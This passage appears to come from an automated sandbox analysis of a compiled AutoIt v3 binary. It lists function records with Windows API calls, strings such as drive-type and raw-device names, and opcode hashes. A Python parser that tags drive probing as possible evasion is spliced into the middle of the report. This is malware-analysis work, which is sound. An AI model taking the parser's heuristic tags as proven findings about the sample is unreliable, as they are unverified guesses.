                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,003F4D67,003F4D1C), ref: 003EA36A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 40f8d425779a5a44787eac42890653299cab4eda7823090ddede02b5abe9de7d
                                                    • Instruction ID: f0b7f1268b8a818c2391a79385a09b3057566f1c089750e86349bcfaba308d64
                                                    • Opcode Fuzzy Hash: 40f8d425779a5a44787eac42890653299cab4eda7823090ddede02b5abe9de7d
                                                    • Instruction Fuzzy Hash: F4A0017619100DABCA011F92FC09CAA7F6DEA476EA7028062F80D84C21873355659AA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Time$FileSystem
                                                    • String ID: 0uH
                                                    • API String ID: 2086374402-4049959059
                                                    • Opcode ID: 184cc61d94f2d720fa9aaf2733c00b7fc27e6d64b487221e9e060fcf3938b84e
                                                    • Instruction ID: 9729977bec8b0847610b384face344d60bfa443bd1ac6df2bfabbcbb64fc49f7
                                                    • Opcode Fuzzy Hash: 184cc61d94f2d720fa9aaf2733c00b7fc27e6d64b487221e9e060fcf3938b84e
                                                    • Instruction Fuzzy Hash: 2A2127722355108FD329CF25E841A56B7E1EBA5310B688E6DE0F5CB2D0CA74B904CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1db12a78eaa90df9dabcb934ebf00f0af71165c9fe3916c600cf0042de3f0a57
                                                    • Instruction ID: ebe308ada8678b4444b4b5aae4922d9f1beb94b7b148bd6201243bc4b0d10f4a
                                                    • Opcode Fuzzy Hash: 1db12a78eaa90df9dabcb934ebf00f0af71165c9fe3916c600cf0042de3f0a57
                                                    • Instruction Fuzzy Hash: DB42A175D202A9CEDF26CFAAC8906EDBBB5FB09310F61522AD456EB6C1D3345C42CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 84d12314d2001b0905f896b30837241e3b3bc33b70f191d2fe93f6d93c5618be
                                                    • Instruction ID: b164ae6e9106eb12090d4aed2a61391122d3f8c5f845cff4dfc399581ce43e2e
                                                    • Opcode Fuzzy Hash: 84d12314d2001b0905f896b30837241e3b3bc33b70f191d2fe93f6d93c5618be
                                                    • Instruction Fuzzy Hash: 27326672E0564D8FDB2ACFA8C8557FDBBB5FB18310F25412AE655AB291DB348C81CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37f5e875c337ebdb890c108490961ec01765d814bacc2b0461a74b169f75c55c
                                                    • Instruction ID: 6e46dc9d75707016be1eb4b225f6220fcc6b800a38afa8376d1d18e6590f08f5
                                                    • Opcode Fuzzy Hash: 37f5e875c337ebdb890c108490961ec01765d814bacc2b0461a74b169f75c55c
                                                    • Instruction Fuzzy Hash: BB322022D69F510CD7239635E822339A24CAFB73D9F25D737F81AB49A6EB68D4834104
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86a59d1c031c3e2f395bf26bcce37b460558bc028bcb7879d7bdd19e4a359327
                                                    • Instruction ID: 3cd8c0bf1bbb2c255b9e48ce481af791d436aac6daeb527265518ccdda1a2aa5
                                                    • Opcode Fuzzy Hash: 86a59d1c031c3e2f395bf26bcce37b460558bc028bcb7879d7bdd19e4a359327
                                                    • Instruction Fuzzy Hash: 2A12A372A1121D9FDF05CFA8E8815FDBBB5FB88320F24463EE622E7294D77069058B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88db6ce7403db9720d0f5c46a65486ba02c312a0e6710be9e1f122377d171081
                                                    • Instruction ID: d357dfddadc88eac5889b414dff078314c81ca795401a8b8150805f51011ec93
                                                    • Opcode Fuzzy Hash: 88db6ce7403db9720d0f5c46a65486ba02c312a0e6710be9e1f122377d171081
                                                    • Instruction Fuzzy Hash: 7602A3322051F20ADB2E4A3B887007BBBE569523B131F476DE4B7CB4C5EE30D965D6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d13b3f12c610b86e141b96ccc6b55593b12a47b6bef3a2a595853d89bc9d5f9
                                                    • Instruction ID: 0f039db379f9175d288be92979028484f9f9ee85ce5176f2855848a5202d5160
                                                    • Opcode Fuzzy Hash: 2d13b3f12c610b86e141b96ccc6b55593b12a47b6bef3a2a595853d89bc9d5f9
                                                    • Instruction Fuzzy Hash: BFC150322050F209EF2E463B993403EFBE56AA27B131B075EE4B3DB4D5EE309565D620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92d4c24914fa398024ca0c4b990b34815a9b6155ae83376abfb071da7c62f562
                                                    • Instruction ID: 01361959b61cde8e355a47e8d497019acf25705c46a15ddd66148849236dab8f
                                                    • Opcode Fuzzy Hash: 92d4c24914fa398024ca0c4b990b34815a9b6155ae83376abfb071da7c62f562
                                                    • Instruction Fuzzy Hash: F6C170332050F30AEF6E463B983403EFBE55A927B131B176DE4B2DB4C5EE309565A620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bae1d401a77f9eb3f3688dd1a964ac2298bba0ff2dab579a5315b1f0768bfc55
                                                    • Instruction ID: 995782352cce45f656cc89567b6a47f8b8269afcd05d32923044e07aff2f11be
                                                    • Opcode Fuzzy Hash: bae1d401a77f9eb3f3688dd1a964ac2298bba0ff2dab579a5315b1f0768bfc55
                                                    • Instruction Fuzzy Hash: 09B16F322090F309DF6E463B983403EBBE56A927B131B076EE4B3CB5C4EE3095659660
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea7184f45fea33a49adb058a43a4e8a425897f187f7f991afb1a49cf75f430b5
                                                    • Instruction ID: 326fe8e8d0d9d77ffa1c6c8b226064f81869c8da07cf43d2e9f095dae0eaf67c
                                                    • Opcode Fuzzy Hash: ea7184f45fea33a49adb058a43a4e8a425897f187f7f991afb1a49cf75f430b5
                                                    • Instruction Fuzzy Hash: 27B10120D2AF414DD72396398831336BB4CAFBB6DAF52D72BFC2674D22EB2185934145
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60eff261274cf77f728fae4922d7137d46833222afe95c08d5303e1c6c5a3e27
                                                    • Instruction ID: a46e9cdca4458d374b19bfa324c4d382dd68f69ff8ffe8f365ee2b00b7cbda9d
                                                    • Opcode Fuzzy Hash: 60eff261274cf77f728fae4922d7137d46833222afe95c08d5303e1c6c5a3e27
                                                    • Instruction Fuzzy Hash: C0618072D0522A9FDF19CF59C8805BAFBF5EFC5310729C16AEA09DB205DA309945CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0044F910,?), ref: 004438AF
                                                    • IsWindowVisible.USER32 ref: 004438D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: be363ed93c9931067f95b0e3721b391051e9abb2387a092a9f30c72530f9033e
                                                    • Instruction ID: 0b3d9ef58abe6fd6beddedfea852831d3db7cbb1424c999f4cdb1fb5a59fa4a4
                                                    • Opcode Fuzzy Hash: be363ed93c9931067f95b0e3721b391051e9abb2387a092a9f30c72530f9033e
                                                    • Instruction Fuzzy Hash: 00D1A130204205DBDB14EF11C855BAAB7A5EF54755F01845EB8865F3E3CB38EE4ACB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A89F
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044A8D0
                                                    • GetSysColor.USER32(0000000F), ref: 0044A8DC
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0044A8F6
                                                    • SelectObject.GDI32(?,?), ref: 0044A905
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044A930
                                                    • GetSysColor.USER32(00000010), ref: 0044A938
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0044A93F
                                                    • FrameRect.USER32 ref: 0044A94E
                                                    • DeleteObject.GDI32(00000000), ref: 0044A955
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044A9A0
                                                    • FillRect.USER32 ref: 0044A9D2
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(00000012), ref: 0044AB99
                                                      • Part of subcall function 0044AB60: SetTextColor.GDI32(?,0044A869), ref: 0044AB9D
                                                      • Part of subcall function 0044AB60: GetSysColorBrush.USER32(0000000F), ref: 0044ABB3
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(0000000F), ref: 0044ABBE
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(00000011), ref: 0044ABDB
                                                      • Part of subcall function 0044AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044ABE9
                                                      • Part of subcall function 0044AB60: SelectObject.GDI32(?,00000000), ref: 0044ABFA
                                                      • Part of subcall function 0044AB60: SetBkColor.GDI32(?,?), ref: 0044AC03
                                                      • Part of subcall function 0044AB60: SelectObject.GDI32(?,?), ref: 0044AC10
                                                      • Part of subcall function 0044AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0044AC2F
                                                      • Part of subcall function 0044AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044AC46
                                                      • Part of subcall function 0044AB60: GetWindowLongW.USER32(?,000000F0), ref: 0044AC5B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongRoundSolidWindow
                                                    • String ID:
                                                    • API String ID: 3205543919-0
                                                    • Opcode ID: 650cdca49451b9588e1f598a95ac9f23938fca59fb5c5a93d7f92b973b3914a1
                                                    • Instruction ID: 92ea5d8aa677acec8985e1d68fbab57cda29e890a343f75a6dd0cae631a05617
                                                    • Opcode Fuzzy Hash: 650cdca49451b9588e1f598a95ac9f23938fca59fb5c5a93d7f92b973b3914a1
                                                    • Instruction Fuzzy Hash: 61A19F76008301BFE7109FA4DC08E6BBBA9FF89321F104A2AF562961E1C775D949CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 004377F1
                                                    • SystemParametersInfoW.USER32 ref: 004378B0
                                                    • SetRect.USER32 ref: 004378EE
                                                    • AdjustWindowRectEx.USER32(?,88C00000,?,00000006), ref: 00437900
                                                    • CreateWindowExW.USER32 ref: 00437946
                                                    • GetClientRect.USER32 ref: 00437952
                                                    • CreateWindowExW.USER32 ref: 00437996
                                                    • CreateDCW.GDI32(DISPLAY,?,?,?), ref: 004379A5
                                                    • GetStockObject.GDI32(00000011), ref: 004379B5
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004379B9
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,?,?,?,?,88C00000,?), ref: 004379C9
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004379D2
                                                    • DeleteDC.GDI32(00000000), ref: 004379DB
                                                    • CreateFontW.GDI32(?,?,?,?,00000258,?,?,?,00000001,00000004,?,00000002,?,?,?,50000000), ref: 00437A07
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00437A1E
                                                    • CreateWindowExW.USER32 ref: 00437A59
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00437A6D
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00437A7E
                                                    • CreateWindowExW.USER32 ref: 00437AAE
                                                    • GetStockObject.GDI32(00000011), ref: 00437AB9
                                                    • SendMessageW.USER32(00000030,00000000,?,static), ref: 00437AC4
                                                    • ShowWindow.USER32(00000004,?,static,?,50000000,?,00000037,00000500,00000032,?,?,?,?,50000000,?,00000004), ref: 00437ACE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 52ad5331cda47b64aaaf25f36abcfe4e325d5d85152e18a411f8410947049648
                                                    • Instruction ID: bab8e80d6b8e765bd4d04c44bc03034b100db4896827585ecd6c26fdb1542aa1
                                                    • Opcode Fuzzy Hash: 52ad5331cda47b64aaaf25f36abcfe4e325d5d85152e18a411f8410947049648
                                                    • Instruction Fuzzy Hash: A3A19FB1A00205BFEB149FA4DD4AFAF7B79EB45710F118169FA14AA1E0C774AD00CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042AF89
                                                    • GetDriveTypeW.KERNEL32(?,0044FAC0,?,\\.\,0044F910), ref: 0042B066
                                                    • SetErrorMode.KERNEL32(00000000,0044FAC0,?,\\.\,0044F910), ref: 0042B1C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: cfd9ff727671ab08b8fbff0834a19654907e8af5b355a06887486b0fe5d34ef9
                                                    • Instruction ID: a9cda6e4f0fb85c70ffbc8ab44686142d24fd23638685564d5dc3068f9900291
                                                    • Opcode Fuzzy Hash: cfd9ff727671ab08b8fbff0834a19654907e8af5b355a06887486b0fe5d34ef9
                                                    • Instruction Fuzzy Hash: 5851A630744715AB8B05DB10E952EBD73B0EB947817B0801BE40AAB290C77DED66DB8F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
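The function records on this page all share one text layout: an "APIs" bullet list of call sites, then "Similarity" key/value bullets. As an added example (not part of the Joe Sandbox report, and not the sandbox's own code), here is a small Python parser that turns that layout into structured records and applies a triage heuristic to the GetDriveTypeW block above. The sample input is a constructed excerpt in the same layout; the DRIVE_APIS set and the flag names are my own assumptions for triage, not fields the report defines.

```python
"""
Parser for the per-function records in this report (an "APIs" bullet list
followed by "Similarity" key/value bullets), plus a small triage heuristic.
Added example; SAMPLE is a constructed excerpt in the report's layout.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied into the report's text layout.
SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0042AF89
• GetDriveTypeW.KERNEL32(?,0044FAC0,?,\\.\,0044F910), ref: 0042B066
• SetErrorMode.KERNEL32(00000000,0044FAC0,?,\\.\,0044F910), ref: 0042B1C4
Strings
Memory Dump Source
• Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fixed$PhysicalDrive$Removable$\\.\$iSCSI
• API String ID: 2907320926-4222207086
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 00444C66
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00449DFA
  • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000001), ref: 003C2399
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
Uniqueness Score: -1.00%
"""


@dataclass
class ApiCall:
    name: str                        # e.g. GetDriveTypeW
    module: str                      # e.g. KERNEL32
    args: List[str]                  # argument tokens as printed ('?' = unresolved)
    ref: int                         # call-site address (hex in the report)
    subcall_of: Optional[str] = None  # set for "Part of subcall function X" lines


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)

    def strings(self) -> List[str]:
        # "String ID" joins the function's referenced strings with '$'
        return [s for s in self.similarity.get("String ID", "").split("$") if s]


API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; one record per "APIs" heading."""
    records: List[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if current is None:
            continue
        if line == "Similarity":
            section = "sim"
            continue
        if not line or line.startswith("Uniqueness"):
            section = None           # blank line or Uniqueness block ends the record
            continue
        if section == "apis":
            m = API_LINE.match(line)
            if m:                    # "Strings" / "Memory Dump Source" lines do not match
                args = m["args"].split(",") if m["args"] is not None else []
                current.apis.append(ApiCall(m["name"], m["module"], args,
                                            int(m["ref"], 16), m["sub"]))
        elif section == "sim":
            m = KV_LINE.match(line)
            if m:
                current.similarity[m["key"].strip()] = m["val"].strip()
    return records


def api_sequence(record: FunctionRecord) -> List[str]:
    """Call sequence in report order as MODULE!Name (subcall lines included)."""
    return [f"{c.module}!{c.name}" for c in record.apis]


# Assumption: these APIs mark drive/volume enumeration worth a closer look.
DRIVE_APIS = {"GetDriveTypeW", "GetDriveTypeA", "GetLogicalDrives",
              "GetLogicalDriveStringsW", "GetVolumeInformationW", "DeviceIoControl"}


def flags(record: FunctionRecord) -> List[str]:
    """Heuristic triage tags (assumed names; not proof of evasion by themselves)."""
    out: List[str] = []
    names = {c.name for c in record.apis}
    if names & DRIVE_APIS:
        out.append("drive-type-query")
    if any(s.startswith("\\\\.\\") or s == "PhysicalDrive" for s in record.strings()):
        out.append("raw-device-path")          # \\.\ prefix = direct device namespace
    if "SetErrorMode" in names and names & DRIVE_APIS:
        # SetErrorMode(1) = SEM_FAILCRITICALERRORS: no "insert disk" dialog while probing
        out.append("suppresses-drive-error-dialogs")
    return out


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, api_sequence(rec), rec.similarity.get("API String ID"), flags(rec))
```

The parser ignores the Memory Dump Source and Strings lines because they never match the API regex, so the same function works on a record pasted with or without them; the "API String ID" value is kept as a string because it is a pair of opaque hashes, not two numbers to compute with.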

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00449D41
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00449DFA
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00449E16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 1118deb2639cc8fc0c9ee7d20cb1a675747b0e2c1f306aa45942b477ae930fab
